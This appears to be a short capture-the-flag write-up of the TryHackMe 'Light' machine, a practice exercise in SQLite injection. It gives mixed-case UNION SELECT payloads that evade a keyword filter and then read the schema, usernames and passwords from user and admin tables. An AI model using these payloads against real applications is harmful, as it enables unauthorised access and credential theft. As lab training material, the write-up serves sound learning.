Light
Welcome to the Light database application!
Intro
Hello everyone its been so long since our last Try hack me machine a simple and cool sql injection machine let's goo.
Enumeration
Port scanning.
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste
Testing the DB.
after some trys i came to this
As you can see when we change the case of the word 'Union' and ' Select' it did not detect and infact we are able to find the password parameter.
also in the image below we can see that the db is sqlite db which we can confirm from that way we get the version of the sql. I also was able to get the names of the tables that exist in the database from the sqlite_master table.
Payload for the sqlite version
' unIon sElecT sqlite_version()'
payload for extracting the table names.
' unIon sElecT group_concat(name) from sqlite_master '
Final steps
From there i have everything i need to find the users and password for both tables the image blow shows that too.
It was just normal sql commands to read from the tables and we are able to find the admin user along with our flag.
Payload for finding the usernames from the usertable\
' uNIon sElect group_concat(username) from usertable'
Payload for finding the passwords for the user in the usertable
' uNIon sElect group_concat(password) from usertable'
Payload for finding the usernames from the admintable
' uNIon sElect group_concat(username) from admintable'
Payload for finding the passwords from the admintable
' uNIon sElect group_concat(password) from admintable' More useful stuff.
After i have done with my work i want to check others solutions in case i miss something would have give me useful information and i found something.
From Mr. Bob writeup we can see this command.
' UniOn SeLeCt group_concat(sql) FROM sqlite_master '
Which gonna give us the sql commands that have been run on the database.
Conclusion.
At the end this machine was quite good for testing you sql injection basic techniques also keep in mind every time you finish a machine look for other solution you maybe have miss something that would make you exploration much more easier.
Last updated